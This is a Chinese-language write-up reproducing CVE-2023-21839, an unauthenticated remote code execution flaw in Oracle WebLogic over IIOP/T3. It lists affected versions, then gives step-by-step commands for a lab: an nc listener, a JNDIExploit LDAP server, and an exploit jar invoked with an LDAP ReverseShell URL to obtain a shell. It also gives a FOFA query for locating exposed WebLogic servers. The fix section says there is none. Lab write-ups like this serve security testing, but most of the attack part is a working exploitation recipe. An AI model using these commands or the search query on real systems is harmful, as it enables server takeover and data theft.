Weblogic_12.2.1_未授权访问漏洞_CVE-2023-21839
说明 | 内容 |
---|---|
漏洞编号 | CVE-2023-21839 |
漏洞名称 | Weblogic_12.2.1_未授权访问漏洞 |
漏洞评级 | 高危 |
影响范围 | 12.2.1.2.0 12.2.1.1.0 12.2.1.3.0 12.2.1.0.0 12.2.1.4.0 14.1.1.0.0 12.1.2.0.0 12.1.3.0.0 10.3.6.0 |
漏洞描述 | 由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server |
修复方案 | 升级新版本 |
漏洞描述
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
漏洞等级
高危
影响版本
- 12.2.1.2.0
- 12.2.1.1.0
- 12.2.1.3.0
- 12.2.1.0.0
- 12.2.1.4.0
- 14.1.1.0.0
- 12.1.2.0.0
- 12.1.3.0.0
- 10.3.6.0
漏洞复现
基础环境
组件 | 版本 |
---|---|
OS | kali-linux |
Web Server | chrome |
weblogic | 12.2.1 |
漏洞验证
漏洞检测工具下载地址:https://github.com/DXask88MA/Weblogic-CVE-2023-21839/releases/tag/CVE-2023-21839
-
拉取镜像,启动环境进入console目录,需要等一会
127.0.0.1:7001/console
-
使用漏洞检测工具进行验证
java -jar Weblogic-CVE-2023-21839.jar 10.9.75.71:7001 ldap://cwc.ecgaej.dnslog.cn
深度利用
ladp服务启动工具下载地址:https://github.com/WhiteHSBG/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip
GetShell
-
首先在kali设置监听,用于接收反弹shell
nc -lvvp 3333
-
使用工具启动ladp服务
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 10.9.75.71
-
使用检测工具来进行攻击测试
java -jar Weblogic-CVE-2023-21839.jar 靶场 IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口
java -jar Weblogic-CVE-2023-21839.jar 10.9.75.71:7001 ldap://10.9.75.71:1389/Basic/ReverseShell/10.9.75.71/3333
EXP编写
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
漏洞挖掘
网络测绘
FOFA
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
修复建议
无